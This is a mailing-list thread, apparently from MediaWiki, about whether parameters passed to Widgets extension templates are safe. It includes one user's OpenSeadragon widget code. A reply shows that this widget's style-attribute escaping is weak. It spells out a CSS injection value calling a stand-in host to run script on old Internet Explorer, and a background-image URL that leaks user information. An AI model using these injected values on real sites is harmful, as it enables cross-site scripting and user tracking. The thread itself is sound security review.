On Sat, Oct 29, 2016 at 2:50 PM, Dr. Michael Bonert
<michael(a)librepathology.org> wrote:
Hello,
I was wondering about the security of Widgets (
https://www.mediawiki.org/wiki/Extension:Widgets ) that get parameters
passed to them. Any thoughts?
Are the parameters passed through to the widget cleansed of html/scripts?
If it isn't -- is it possible to easily enforce typing/boundaries on the
parameters?
Generally, speaking, I am looking for a discussion around security &
widgets.
A widget I created (below) takes three parameters (width, height, filename)
and feeds those to OpenSeadragon(
https://openseadragon.github.io /
https://en.wikipedia.org/wiki/Seadragon_Software ). It works on a testing
server.
OpenSeadragon was discussed in brain storming in 2015 -
https://www.mediawiki.org/wiki/Reading/Quarterly_Brainstorming
My interest in this is virtual (microscopic) slides (e.g.
http://openslide.org/demo/ ) which are often
several gigabytes of data each.
Thanks,
Michael
------------------------
Widget code...
Create page: Widget:OpenSeadragon
---------------------------------------------------------------------
<noinclude>__NOTOC__
<!-- Copyright (c) 2016 Michael Bonert -->
<!-- Released under GNU General Public Licence - Version 3; see
http://www.gnu.org/licenses/gpl.html -->
To insert this widget, use the following code:
<nowiki>{{#widget:</nowiki>{{PAGENAME}}<nowiki>
|image=12881.dzi
|width=800
|height=600
}}</nowiki>
</noinclude>
<includeonly><!-- This inserts an OpenSeadragon image -->
<div id="openseadragon1" style="width:
<!--{$width|default:400|escape:'html'}-->px; height:
<!--{$height|default:300|escape:'html'}-->px;"></div>
<script src="../../openseadragon/openseadragon.min.js"></script>
<script type="text/javascript">
var viewer = OpenSeadragon({
id: "openseadragon1",
prefixUrl: "../../openseadragon/images/",
tileSources:
"../../vslide/<!--{$image|escape:'urlpathinfo'}-->"
});
</script>
</includeonly>
-------------------------------------------------
In theory that's what the escape modifier is for in smarty parameters.
However, in this example, <!--{$width|default:400|escape:'html'}-->px;
inside a style attribute isn't really sufficient, as a user could set
a width parameter like "400; behavior: url(
'https://foo.com/bar.htc#baz' );x: ", which would cause javascript
execution on IE9 and older. (There are other properties for other
browsers, however mostly affecting only older browsers). You could
also leak private info about your users by doing something like
background-image: url( "http://external.com/foo.png" ) .
[Disclaimer: I have not read the source code of the widgets extension,
so there could also potentially be generic security issues with the
extension. Since I haven't reviewed it, I don't really know].
--
bawolff
Just as a p.s. I just poked around
. I looked at
three widgets at random - all 3 had XSS vulnerabilities. Now of
course, 3 is a very small sample size, so it may have been luck of the
draw. Nevertheless, I'd like to take this moment to urge anyone using
a widget made by someone else to review it carefully before use as
many widgets are insecure.
--
bawolff